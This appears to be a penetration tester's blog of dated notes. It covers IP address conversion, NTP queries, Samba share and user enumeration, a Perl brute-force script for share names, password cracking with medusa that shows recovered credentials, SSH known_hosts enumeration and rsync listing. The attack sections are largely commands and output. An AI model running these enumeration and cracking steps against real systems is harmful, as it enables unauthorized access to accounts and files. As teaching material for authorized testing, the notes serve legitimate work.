Friday, September 27, 2019

Positional Notation for IP Addresses

Positional notation means that a digit represents different values depending on the position it occupies.

More specifically, the value that a digit represents is the value of the digit multiplied by the power of the base (or radix) that corresponds to the position the digit occupies.

In the binary numbering system the radix is 2, so each position represents an increasing power of two. In an 8-bit binary number the positions represent the quantities shown:

2^7  2^6  2^5  2^4  2^3  2^2  2^1  2^0
128   64   32   16    8    4    2    1

The base 2 numbering system has only two digits: 0 and 1. When a byte is interpreted as a decimal number, the quantity a position represents is added to the total if the digit in that position is a 1, and 0 is added if the digit is a 0.

A 1 in each position means that the value for that position is added to the total.

128 64 32 16 8 4 2 1
1 1 1 1 1 1 1 1
128+64+32+16+8+4+2+1 = 255

The value of each position is added to determine the total value of the number.

A 0 in each position indicates that the value for that position is not added to the total.

128 64 32 16 8 4 2 1
0 0 0 0 0 0 0 0
0+0+0+0+0+0+0+0 = 0

To convert a 32-bit IP address, identify the 4 bytes (octets) that make up the address, then convert each of the four octets to decimal.

The conversion here starts with the low-order (rightmost) octet and continues to the high-order (leftmost) octet, so the "first octet" below is the rightmost group of bits.

10101100.00010000.00000100.00010100

128 64 32 16 8 4 2 1
0 0 0 1 0 1 0 0 = Binary of first octet
0+0+0+16+0+4+0+0 = 20 decimal

128 64 32 16 8 4 2 1
0 0 0 0 0 1 0 0 = Binary of second octet
0+0+0+0+0+4+0+0 = 4 decimal


128 64 32 16 8 4 2 1
0 0 0 1 0 0 0 0 = Binary of third octet
0+0+0+16+0+0+0+0 = 16 decimal

128 64 32 16 8 4 2 1
1 0 1 0 1 1 0 0 = Binary of fourth octet
128+0+32+0+8+4+0+0 = 172 decimal

In this example the binary number 10101100.00010000.00000100.00010100 is converted to 172.16.4.20.
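
The weighted-sum conversion above as an added Python example (not part of the original notes): it converts a dotted-binary address to dotted decimal and back using the 128..1 position weights, prints the per-octet addition the notes write out by hand, and works unchanged for subnet masks.

```python
"""Convert IPv4 addresses between dotted binary and dotted decimal by positional notation.

Added example, not part of the original notes. It deliberately uses the weighted
sum described above (128, 64, ..., 1) rather than int(bits, 2), so every step
of the hand conversion is visible. Subnet masks convert the same way.
"""
from typing import List

# Weight of each bit position in an octet, high-order bit first: 2^7 .. 2^0
WEIGHTS: List[int] = [2 ** p for p in range(7, -1, -1)]  # [128, 64, 32, 16, 8, 4, 2, 1]


def octet_to_decimal(bits: str) -> int:
    """Add the weight of every position that holds a 1.

    '10101100' -> 128 + 0 + 32 + 0 + 8 + 4 + 0 + 0 = 172
    """
    if len(bits) != 8 or set(bits) - {"0", "1"}:
        raise ValueError(f"not an 8-bit binary octet: {bits!r}")
    return sum(weight for bit, weight in zip(bits, WEIGHTS) if bit == "1")


def decimal_to_octet(value: int) -> str:
    """Reverse the process: from 128 down to 1, emit a 1 and subtract the
    weight whenever it still fits in the remaining value, otherwise a 0."""
    if not 0 <= value <= 255:
        raise ValueError(f"octet value out of range 0..255: {value}")
    bits = []
    for weight in WEIGHTS:
        if value >= weight:
            bits.append("1")
            value -= weight
        else:
            bits.append("0")
    return "".join(bits)


def split_octets(addr: str) -> List[str]:
    """Split a dotted address into its four octets, rejecting anything else."""
    octets = addr.split(".")
    if len(octets) != 4:
        raise ValueError(f"an IPv4 address has exactly four octets: {addr!r}")
    return octets


def binary_to_dotted_decimal(addr: str) -> str:
    """'10101100.00010000.00000100.00010100' -> '172.16.4.20'"""
    return ".".join(str(octet_to_decimal(o)) for o in split_octets(addr))


def dotted_decimal_to_binary(addr: str) -> str:
    """'172.16.4.20' -> '10101100.00010000.00000100.00010100'"""
    return ".".join(decimal_to_octet(int(o)) for o in split_octets(addr))


def show_work(bits: str) -> str:
    """Render one octet's addition the way the notes write it out by hand."""
    terms = [str(weight) if bit == "1" else "0" for bit, weight in zip(bits, WEIGHTS)]
    return f"{'+'.join(terms)} = {octet_to_decimal(bits)} decimal"


if __name__ == "__main__":
    example = "10101100.00010000.00000100.00010100"
    for octet in split_octets(example):
        print(f"{octet} -> {show_work(octet)}")
    print(example, "->", binary_to_dotted_decimal(example))
    print("255.255.255.0", "->", dotted_decimal_to_binary("255.255.255.0"))
```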

Tuesday, September 24, 2019

Exploring NTP servers

The ntpdate command is used for updating your system time from a remote NTP server. With the -d (debug) flag used below it goes through every step of the exchange and prints it, but does not actually adjust the local clock.

root@asus:~/unix% ntpdate -d 48.21.33.124
24 Sep 11:12:41 ntpdate[18621]: ntpdate 4.2.8p4@1.3265-o Fri Jul  6 20:10:56 UTC 2018 (1)
Looking for host 48.21.33.124 and service ntp
48.21.33.124 reversed to ntp.acme.com
host found : ntp.acme.com
transmit(48.21.33.124)
receive(48.21.33.124)
transmit(48.21.33.124)
receive(48.21.33.124)
transmit(48.21.33.124)
receive(48.21.33.124)
transmit(48.21.33.124)
receive(48.21.33.124)
server 48.21.33.124, port 123
stratum 2, precision -22, leap 00, trust 000
refid [48.21.33.124], delay 0.02568, dispersion 0.00002
transmitted 4, in filter 4
reference time:    e134cbc9.cb958ac6  Tue, Sep 24 2019 11:07:21.795
originate timestamp: e134cd0f.ac4c0844  Tue, Sep 24 2019 11:12:47.673
transmit timestamp:  e134cd0f.ac3db00b  Tue, Sep 24 2019 11:12:47.672
filter delay:  0.02583  0.02579  0.02568  0.02579 
         0.00000  0.00000  0.00000  0.00000 
filter offset: 0.000014 -0.00001 0.000008 -0.00003
         0.000000 0.000000 0.000000 0.000000
delay 0.02568, dispersion 0.00002
offset 0.000008

24 Sep 11:12:47 ntpdate[18621]: adjust time server 48.21.33.124 offset 0.000008 sec
root@asus:~/unix% 
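
The timestamps ntpdate prints above (e.g. e134cd0f.ac4c0844) are 64-bit NTP timestamps: 32 bits of seconds since 1900 and 32 bits of binary fraction, shown in hex. The following Python, added here and not part of the original notes, decodes them to UTC (the local times above are MDT, UTC-6) and shows how the reported offset and delay derive from a full four-timestamp exchange per RFC 5905; the four sample values used for that are constructed.

```python
"""Decode the 64-bit NTP timestamps that ntpdate -d prints.

Added example, not part of the original notes. An NTP timestamp is 32 bits
of seconds since 1900-01-01 00:00:00 UTC followed by 32 bits of binary
fraction; ntpdate shows it as two hex words, e.g. e134cd0f.ac4c0844.
"""
from datetime import datetime, timedelta, timezone
from typing import Tuple

NTP_EPOCH = datetime(1900, 1, 1, tzinfo=timezone.utc)
# Seconds from the NTP epoch (1900) to the Unix epoch (1970), per RFC 5905.
NTP_TO_UNIX = 2_208_988_800
FRACTION_UNIT = 2 ** 32  # the fraction word counts 1/2^32 seconds


def parse_ntp_timestamp(text: str) -> Tuple[int, int]:
    """Split 'e134cd0f.ac4c0844' into (seconds, fraction) integers."""
    secs_hex, _, frac_hex = text.strip().partition(".")
    if len(secs_hex) != 8 or len(frac_hex) != 8:
        raise ValueError(f"malformed NTP timestamp: {text!r}")
    return int(secs_hex, 16), int(frac_hex, 16)


def ntp_to_unix(text: str) -> float:
    """Unix time in seconds. Valid for NTP era 0 (1900 to 2036): the 32-bit
    seconds field wraps in February 2036, after which an era number is needed."""
    secs, frac = parse_ntp_timestamp(text)
    return secs - NTP_TO_UNIX + frac / FRACTION_UNIT


def ntp_to_datetime(text: str) -> datetime:
    """Timezone-aware UTC datetime with microsecond resolution."""
    secs, frac = parse_ntp_timestamp(text)
    micros = round(frac * 1_000_000 / FRACTION_UNIT)
    return NTP_EPOCH + timedelta(seconds=secs, microseconds=micros)


def seconds_between(earlier: str, later: str) -> float:
    """later - earlier in seconds, e.g. from the reference time to the transmit timestamp."""
    return ntp_to_unix(later) - ntp_to_unix(earlier)


def offset_and_delay(t1: float, t2: float, t3: float, t4: float) -> Tuple[float, float]:
    """Clock offset and round-trip delay of one exchange (RFC 5905, section 8).

    t1 = client transmit (originate), t2 = server receive,
    t3 = server transmit, t4 = client receive (destination), all in seconds.
    These are the quantities ntpdate reports as 'offset' and 'delay'.
    """
    offset = ((t2 - t1) + (t3 - t4)) / 2
    delay = (t4 - t1) - (t3 - t2)
    return offset, delay


if __name__ == "__main__":
    for label, stamp in [("reference time", "e134cbc9.cb958ac6"),
                         ("originate timestamp", "e134cd0f.ac4c0844"),
                         ("transmit timestamp", "e134cd0f.ac3db00b")]:
        print(f"{label:20s} {stamp} -> {ntp_to_datetime(stamp).isoformat()}")
    print("reference -> transmit:",
          round(seconds_between("e134cbc9.cb958ac6", "e134cd0f.ac3db00b"), 3), "s")
```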

Using ntptrace like traceroute

The ntptrace utility works like traceroute, reporting the links in the chain to the local NTP server.

root@asus:~/unix% ntptrace
ntp.acme.com: stratum 2, offset 0.004367, synch distance 0.045800
69.89.207.99: timed out, nothing received
***Request timed out
root@asus:~/unix% 

Using ntpq to query the remote NTP server

The ntpq utility is for diagnostics and information gathering on a specific NTP server. It has an interface similar to that of ftp and smb. Commands can be run from the command line with the '-c' option instead of working in the ntpq console.

root@asus:~/unix% ntpq
ntpq> help
ntpq commands:
:config          exit             mreadvar         reslist          
addvars          help             mrl              rl               
apeers           host             mrulist          rmvars           
associations     hostnames        mrv              rv               
authenticate     ifstats          ntpversion       saveconfig       
authinfo         iostats          opeers           showvars         
cl               kerninfo         passociations    sysinfo          
clearvars        keyid            passwd           sysstats         
clocklist        keytype          peers            timeout          
clockvar         lassociations    poll             timerstats       
config-from-file lopeers          pstats           version          
cooked           lpassociations   quit             writelist        
cv               lpeers           raw              writevar         
debug            monstats         readlist         
delay            mreadlist        readvar          
ntpq> exit
root@asus:~/unix%

We can list the peers of the NTP server with the 'peers' command.

root@asus:~/unix% ntpq -c peers 48.21.33.124
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
 0.us.pool.ntp.o .POOL.          16 p    -   64    0    0.000    0.000   0.000
 1.us.pool.ntp.o .POOL.          16 p    -   64    0    0.000    0.000   0.000
 2.us.pool.ntp.o .POOL.          16 p    -   64    0    0.000    0.000   0.000
 3.us.pool.ntp.o .POOL.          16 p    -   64    0    0.000    0.000   0.000
 ntp.ubuntu.com  .POOL.          16 p    -   64    0    0.000    0.000   0.000
+t1.time.gq1.yah 208.71.46.33     2 u   17   64  377   45.844   -0.416   2.455
-time.airgapped. 252.74.143.178   2 u   12   64  357   35.072    2.880  11.748
-hydra.spiderspa 142.66.101.13    2 u   12   64  377   47.258    6.998   2.777
*ntp1.wiktel.com .PPS.            1 u   19   64  377   59.587    0.386   2.643
+x.ns.gin.ntt.ne 249.224.99.213   2 u    6   64  377   30.873   -0.577   1.624
root@asus:~/unix% 

We can list the system info with the 'sysinfo' command

root@asus:~/unix% ntpq -c sysinfo 48.21.33.124
associd=0 status=0615 leap_none, sync_ntp, 1 event, clock_sync,
system peer:        ntp1.wiktel.com:123
system peer mode:   client
leap indicator:     00
stratum:            2
log2 precision:     -22
root delay:         59.587
root dispersion:    5.909
reference ID:       69.89.207.99
reference time:     e134cd50.53825fcb  Tue, Sep 24 2019 11:13:52.326
system jitter:      1.173226
clock jitter:       2.882
clock wander:       0.633
broadcast delay:    0.000
symm. auth. delay:  0.000
root@asus:~/unix% 

There's a whole host of commands in the ntpq console at your disposal to find out some interesting information about NTP servers.

Interrogating Samba Servers

Finding open smb shares with NMAP

NMAP allows us to probe for possible open SMB shares using its scripting engine.

root@asus:~/unix% nmap -T4 -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 48.21.33.124

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:17 MDT
Nmap scan report for srv01.acme.com (48.21.33.124)
Host is up (0.00013s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: username
|   IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (asus server (Samba, Ubuntu))
|     Users: 2
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|_    Current user access: 

Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
root@asus:~/unix% 

NMAP reports two shares open using the username 'username'. Next we will do it manually and see what results we get from smbclient.

Listing remote shares

root@asus:~/pentest_notes% smbclient -L //srv01.acme.com -N
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

 Sharename       Type      Comment
 ---------       ----      -------
 homes           Disk      Home Directories
 IPC$            IPC       IPC Service (asus server (Samba, Ubuntu))
 print$          Disk      Printer Drivers
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

 Server               Comment
 ---------            -------
 ASUS                 asus server (Samba, Ubuntu)

 Workgroup            Master
 ---------            -------
 WORKGROUP            ASUS
root@asus:~/pentest_notes% 

If we try to connect to the 'homes' share we get this result.

root@asus:~/pentest_notes% smbclient //srv01.acme.com/homes -N
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
root@asus:~/pentest_notes% 

We get an error saying `BAD NETWORK NAME`, but the comment column says `Home Directories`, which we will assume means the users' home directories. Our next step will be to figure out which usernames correspond to share names.

Enumerating Samba users with NMAP

In order to enumerate the possible users on the system we can issue an nmap command running the script 'smb-enum-users' and see if we get lucky.

root@asus:~/unix% nmap -sU -sS --script=smb-enum-users -p U:137,T:139 48.21.33.124

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:07 MDT
Nmap scan report for srv01.acme.com (48.21.33.124)
Host is up (0.0027s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
137/udp open  netbios-ns

Host script results:
| smb-enum-users: 
|   ASUS\clare (RID: 1001)
|     Full name:   clare chapman
|     Description: 
|     Flags:       Normal user account
|   ASUS\hayden (RID: 1002)
|     Full name:   hayden sutton
|     Description: 
|     Flags:       Normal user account
|   ASUS\jared (RID: 1003)
|     Full name:   jared beck
|     Description: 
|     Flags:       Normal user account
|   ASUS\sam (RID: 1000)
|     Full name:   sam
|     Description: 
|     Flags:       Normal user account
|   ASUS\sasha (RID: 1004)
|     Full name:   sasha kim
|     Description: 
|     Flags:       Normal user account
|   ASUS\vance (RID: 1005)
|     Full name:   vance perkins
|     Description: 
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
root@asus:~/unix%

As you can see, we found the users on the remote system. Our next step is to verify that the shares exist.

Enumerating possible shares via brute force

If we do not know any of the names of the shares in Home Directories, we need to use a dictionary attack to uncover common share names on the remote machine. For this we can write a small Perl script around the smbclient tool to check whether a share exists. We will use a list of common first names as our payload.

#!/usr/bin/env perl
use strict;
use warnings;
##
## Dictionary attack against a Samba server using smbclient:
## try to uncover common user shares
##

my $host = "48.21.33.124";
my $filename = "common-names.txt";
open(my $fh, '<', $filename) or die $!;

while (my $word = <$fh>) {
    chomp($word);

    ## Try to connect to the share with no password
    my $result = qx( smbclient //$host/$word -N 2>/dev/null );

    ## ACCESS_DENIED means the share exists
    ## BAD_NETWORK_NAME means the share does not exist
    if ($result =~ /NT_STATUS_ACCESS_DENIED/) {
        print "[+] Share Found @ //$host/$word\n";
    }
}
close($fh);

root@asus:~/pentest_notes% ./smbclient-share-brute.pl 
[+] Share Found @ //48.21.33.124/clare
[+] Share Found @ //48.21.33.124/hayden
[+] Share Found @ //48.21.33.124/jared
[+] Share Found @ //48.21.33.124/sam
[+] Share Found @ //48.21.33.124/sasha
[+] Share Found @ //48.21.33.124/vance
root@asus:~/pentest_notes% 

As you can see we found some valid shares on the remote machine we can try to connect to. But first we need to check if these shares require a password or allow us to browse anonymously. We can issue the following command to check if authentication is needed for the share in question.

root@asus:~/pentest_notes% smbclient //srv01.acme.com/hayden -U hayden -N
Enter hayden's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED
root@asus:~/pentest_notes% 

The account does not allow anonymous browsing with a blank password.

Cracking share passwords

Once we have found some valid share names we can try to crack the passwords associated with the accounts to gain access. For this we will use the tool 'medusa' and the rockyou wordlist as our payload.

root@asus:~% medusa -M smbnt -v 4 -b -h srv01.acme.com -U smb-users.txt -P rockyou.txt
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: hayden Password: manager [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: jared Password: attlabs [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: sasha Password: master [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: vance Password: sonics [SUCCESS (ADMIN$ - Share Unavailable)]
root@asus:~% 

As you can see we found some valid logins we can test. Our next step is to log in with the supplied credentials and try to browse the shares.

Browsing Shares

Now that we have valid logins and passwords for some of the users on the remote machine, we can try to access the shares. SMB has a client similar to the ftp and nfs clients which is easy to use.

root@asus:~/pentest_notes% smbclient //srv01.acme.com/hayden -U hayden
Enter hayden's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> 

This is what a successful login looks like. Let's now type the 'help' command to see all the commands available to us in this session.

smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            dir            du             
echo           exit           get            getfacl        geteas         
hardlink       help           history        iosize         lcd            
link           lock           lowercase      ls             l              
mask           md             mget           mkdir          more           
mput           newer          notify         open           posix          
posix_encrypt  posix_open     posix_mkdir    posix_rmdir    posix_unlink   
print          prompt         put            pwd            q              
queue          quit           readlink       rd             recurse        
reget          rename         reput          rm             rmdir          
showacls       setea          setmode        scopy          stat           
symlink        tar            tarmode        timeout        translate      
unlock         volume         vuid           wdel           logon          
listconnect    showconnect    tcon           tdis           tid            
logoff         ..             !              
smb: \> 

As you can see the interface is similar to that of the ftp client, so our next step is to see if we can list the directory contents of the share.

smb: \> ls
  .                                   D        0  Wed May 15 07:45:17 2019
  ..                                  D        0  Sat Apr 27 16:58:49 2019
  .Xdefaults                          H     1600  Sat Apr 27 16:58:15 2019
  .kodi                              DH        0  Sat Apr 27 16:58:15 2019
  .profile                            H      655  Sat Apr 27 16:58:15 2019
  .bashrc                             H     3771  Sat Apr 27 16:58:15 2019
  .xscreensaver                       H     7953  Sat Apr 27 16:58:15 2019
  .bash_logout                        H      220  Sat Apr 27 16:58:15 2019
  .local                             DH        0  Sat Apr 27 16:58:15 2019
  ftp                                DR        0  Wed May 15 07:49:46 2019
  mail                                D        0  Wed May  1 09:44:03 2019
  .mozilla                           DH        0  Sat Apr 27 16:58:15 2019
  .config                            DH        0  Sat Apr 27 16:58:15 2019

  15013808 blocks of size 1024. 2057708 blocks available
smb: \> 

Let's try to get a file from the remote share.

smb: \> get .profile
getting file \.profile of size 655 as .profile (23.7 KiloBytes/sec) (average 23.7 KiloBytes/sec)
smb: \> 

Let's try and see if we have write access to the remote share.

smb: \> put server.pl
putting file server.pl as \server.pl (25.2 kb/s) (average 25.2 kb/s)
smb: \> 

Changing directories is easy

smb: \> cd ftp
smb: \ftp\> ls
  .                                  DR        0  Wed May 15 07:49:46 2019
  ..                                  D        0  Mon Sep  2 14:54:37 2019
  fo                                  D        0  Wed May 15 07:49:41 2019
  files                               D        0  Wed May 15 07:49:46 2019

  15013808 blocks of size 1024. 2063700 blocks available
smb: \ftp\> 

Playing with SSH

Today we are going to show a few simple ways you can attack SSH during your pentests. The utilities we are going to use are ssh, scp, ssh-keygen and ssh-agent.

Files and directories of interest:

.rhosts
.shosts
/etc/hosts.equiv
/etc/known_hosts
~/.ssh/known_hosts
/etc/ssh_host_key
/etc/sshd_config

First we need to know where to look for the files we seek. Here is a list of possible locations where the ssh keys could be stored.

/etc/known_hosts
~/.ssh/known_hosts

To find out which entry in known_hosts is for a known hostname:

ssh-keygen -H -F [hostname]

sam@asus:~/.ssh% ssh-keygen -H -F 192.168.0.114
|1|aP8X7rqELFIt1E+CCZAydtyEk6Y=|10zWG8d41M4chq+dWCeYl478K44= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGYiocw4QQHtt3o3fWtQukbtNSEdJ/hVqdZloOEDr/sPfPTMtuMrZrqZUJPcFCNKq8fruQuNz69TuQvtPtKpPoU=
sam@asus:~/.ssh% 

sam@asus:~/.ssh% ssh-keygen -H -F 192.168.0.133
|1|YZz3ABZMj6+Jfjsr0EkD69NAJ24=|xereMKxRccSiiwD/H6XFjwJIpiY= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBu6FvLNdLBgBK65PUi5cvDNWGid18FRubq2GtAnzGi47AO8TgotV9oEHVoVRJxZrtbEu0Ub3ueoBkWGsC46XLE=
sam@asus:~/.ssh% 

ssh-keyscan is a utility for gathering the public ssh host keys of a number of hosts.

sam@asus:~/.ssh% ls -la /usr/bin/ssh-keyscan 
-rwxr-xr-x 1 root root 411888 Nov  5 04:26 /usr/bin/ssh-keyscan
sam@asus:~/.ssh% 

We have execute permission, so let's run a simple scan on the hosts file to see what we can find.

sam@asus:~/.ssh% ssh-keyscan -t rsa,dsa -f known_hosts
getaddrinfo |1|aP8X7rqELFIt1E+CCZAydtyEk6Y=|10zWG8d41M4chq+dWCeYl478K44=: Name or service not known
getaddrinfo |1|aP8X7rqELFIt1E+CCZAydtyEk6Y=|10zWG8d41M4chq+dWCeYl478K44=: Name or service not known
getaddrinfo |1|8h12/1DU2Hlo17sZMNgIah3GPIE=|Fvd464UQOihOv/HpFvnLeLNYU8E=: Name or service not known
getaddrinfo |1|8h12/1DU2Hlo17sZMNgIah3GPIE=|Fvd464UQOihOv/HpFvnLeLNYU8E=: Name or service not known
getaddrinfo |1|YZz3ABZMj6+Jfjsr0EkD69NAJ24=|xereMKxRccSiiwD/H6XFjwJIpiY=: Name or service not known
getaddrinfo |1|YZz3ABZMj6+Jfjsr0EkD69NAJ24=|xereMKxRccSiiwD/H6XFjwJIpiY=: Name or service not known
sam@asus:~/.ssh% 

Enumerating ssh known_hosts via /etc/hosts

We can search the /etc/hosts file for other possible leads.

sam@asus:~/.ssh% ls -la /etc/hosts;cat /etc/hosts
-rw-r--r-- 1 root root 251 Jan  7 15:23 /etc/hosts
127.0.0.1 localhost
127.0.1.1 asus
192.168.0.114 debian9.acme.com


# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
sam@asus:~/.ssh% 

Let's extract the hostnames (the second column) from /etc/hosts; the output can be redirected to a file for the next step.

root@asus:~/pentest_notes% cat /etc/hosts | awk 'BEGIN{FS="\t"} {print $2}' | sed -e '/^$/d' -e '/localhost/d'
asus
debian9.acme.com
root@asus:~/pentest_notes% 

Once we have an enumeration list we can write a shell script using `ssh-keygen` to check whether each host in our list has an entry in known_hosts.

#!/usr/bin/env bash

hosts=( debian.acme.com taurus.acme.com nemo.acme.com 192.168.0.114 firewall.acme.com 192.168.0.133 )

for host in "${hosts[@]}"
do
    ## ssh-keygen -F prints the matching known_hosts line(s) and nothing when
    ## there is no match; with -H the printed host field is hashed (|1|...).
    result=$(ssh-keygen -H -F "${host}" | awk '/^\|1\|/ {print 1; exit}')
    if [[ ${result} == "1" ]]
    then
        echo "${host} found for key in known_hosts"
    fi
done

root@asus:~/pentest_notes% ./ssh.sh 
debian.acme.com found for key in known_hosts
root@asus:~/pentest_notes%

As you can see we got one entry: `debian.acme.com`. Now we have a list of other hosts on the network we have shell access to for further testing.
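
What `ssh-keygen -H -F` is doing above, and what the script is really testing: with HashKnownHosts on, each known_hosts host field is |1|<base64 salt>|<base64 HMAC-SHA1(salt, hostname)>, so a lookup recomputes the HMAC with each line's salt. The Python below, added here and not part of the original notes, reproduces that lookup and the list check; the known_hosts content is constructed with placeholder key blobs, using hostnames from this page.

```python
"""Look up hostnames in a known_hosts file whose entries are hashed.

Added example, not part of the original notes. With HashKnownHosts enabled,
OpenSSH writes each host as |1|<base64 salt>|<base64 HMAC-SHA1(salt, host)>.
`ssh-keygen -H -F <host>` recomputes that HMAC for every line, which is what
the functions below do in Python. The sample file is constructed; its key
material is a placeholder.
"""
import base64
import hashlib
import hmac
import os
from typing import List, Optional, Tuple

HASH_MAGIC = "|1|"  # OpenSSH marker for a hashed host field (hash type 1 = HMAC-SHA1)


def hash_host(hostname: str, salt: Optional[bytes] = None) -> str:
    """Produce the |1|salt|hash host field for hostname (random 20-byte salt by default).

    A host on a non-default port is written by OpenSSH as '[host]:port', and
    that whole string is what gets hashed.
    """
    salt = os.urandom(20) if salt is None else salt
    digest = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return HASH_MAGIC + base64.b64encode(salt).decode() + "|" + base64.b64encode(digest).decode()


def host_matches(host_field: str, hostname: str) -> bool:
    """True if a known_hosts host field (hashed or plain) names hostname."""
    if host_field.startswith(HASH_MAGIC):
        try:
            _, _, salt_b64, hash_b64 = host_field.split("|")
            salt = base64.b64decode(salt_b64, validate=True)
            expected = base64.b64decode(hash_b64, validate=True)
        except ValueError:  # wrong field count, or bad base64 (binascii.Error is a ValueError)
            return False
        actual = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
        return hmac.compare_digest(actual, expected)
    # Plain entries may list several names/addresses separated by commas.
    return hostname in host_field.split(",")


def find_host(known_hosts: str, hostname: str) -> List[Tuple[int, str, str]]:
    """Return (line number, key type, key) for every entry matching hostname."""
    hits = []
    for lineno, raw in enumerate(known_hosts.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if fields and fields[0].startswith("@"):  # @cert-authority / @revoked marker
            fields = fields[1:]
        if len(fields) < 3:
            continue  # malformed line: need host field, key type and key
        if host_matches(fields[0], hostname):
            hits.append((lineno, fields[1], fields[2]))
    return hits


def hosts_in_known_hosts(known_hosts: str, candidates: List[str]) -> List[str]:
    """The candidates (e.g. names taken from /etc/hosts) that have an entry."""
    return [h for h in candidates if find_host(known_hosts, h)]


# Constructed sample file. The salt is fixed so the sample is reproducible; the
# hostnames are the ones discussed above, the key blobs are placeholders.
FIXED_SALT = b"\x01" * 20
SAMPLE_KNOWN_HOSTS = "\n".join([
    f"{hash_host('192.168.0.114', FIXED_SALT)} ecdsa-sha2-nistp256 AAAAE2VjZHNhPLACEHOLDER",
    f"{hash_host('debian9.acme.com', FIXED_SALT)} ssh-ed25519 AAAAC3NzaC1lZDI1NTE5PLACEHOLDER",
    "firewall.acme.com,192.168.0.133 ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDER",
])

if __name__ == "__main__":
    etc_hosts_names = ["debian.acme.com", "taurus.acme.com", "nemo.acme.com",
                       "192.168.0.114", "firewall.acme.com", "192.168.0.133"]
    for name in hosts_in_known_hosts(SAMPLE_KNOWN_HOSTS, etc_hosts_names):
        for lineno, keytype, _ in find_host(SAMPLE_KNOWN_HOSTS, name):
            print(f"{name} found in known_hosts line {lineno} ({keytype})")
```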

Get and display a host's public key

If you have not yet connected to ssh.example.com, run ssh-keyscan ssh.example.com to retrieve it and ssh-keygen -F ssh.example.com to display it. Ideally, you would double-check with the owner of ssh.example.com that it is indeed the server's public key and not the key of a spoofed instance of ssh.example.com.

Get a host's public key

sam@asus:~% ssh-keyscan 192.168.0.25
# 192.168.0.25:22 SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u4
192.168.0.25 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKyD1nuUcW8olAYwHDIwBT57W1/dm6uvsis598HePVl8
sam@asus:~% 

Once we have the host's public key, we can display it like so:

Display a host's public key

sam@asus:~% ssh-keygen -F 192.168.0.25
# Host 192.168.0.25 found: line 5 
|1|AgJUJ1s82ZKx2XJVCWbtbpdUwrA=|1uhVzOOjW5CArQIXOwego4n7ux0= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLucsnK25OOWpAyH4ki4Ome576pVuqxjs39KAcxIuWXbNTboPy3Y+jO8nuxUfLCsBDXGDp0xHdGuhO5g28Vzfkg=
sam@asus:~% 

Monday, September 23, 2019

Enumerating RSYNC servers with examples

Listing remote files and directories

root@ubuntu:~# rsync -rdt rsync://148.43.33.23:873
code            backup
root@ubuntu:~# 
root@ubuntu:~# rsync -rdt rsync://148.43.33.23:873/code
drwxr-xr-x          4,096 2019/08/26 11:57:35 .
-rw-rw-r--         10,240 2019/08/26 11:57:35 archive.tar
-rw-rw-r--        151,155 2019/08/04 16:45:38 fgets.png
-rw-rw-r--        151,483 2019/08/04 16:43:16 file-get-contents.png
-rw-rw-r--        150,683 2019/08/04 16:28:27 fread.png
-rw-r--r--          4,304 2019/08/26 11:45:23 fuzz.php
-rw-rw-r--         14,514 2019/08/17 12:49:43 http-auth.png
-rw-rw-r--        150,810 2019/08/04 16:43:52 include.png
-rw-rw-r--        388,241 2019/08/19 13:12:31 lfi-rce-perl.png
-rw-rw-r--        406,990 2019/08/17 20:18:15 lfi-rce.png
-rw-rw-r--        150,723 2019/08/04 16:44:51 readfile.png
-rw-rw-r--        344,161 2019/08/06 15:56:35 recipes-1.0.zip
drwxrwxr-x          4,096 2019/08/17 20:03:33 logs
-rwxrwxr-x         65,863 2019/08/17 20:01:11 logs/access.log
root@ubuntu:~# 

Copy a file to a server

rsync -zvh [local file] [user]@[host]:/path/to/remote/dir
root@ubuntu:~# rsync -zvh archive.tar data@148.43.33.23:/home/data/backup/
data@148.43.33.23's password: 
archive.tar

sent 252 bytes  received 35 bytes  52.18 bytes/sec
total size is 10.24K  speedup is 35.68
root@ubuntu:~# 

Copy files from a server

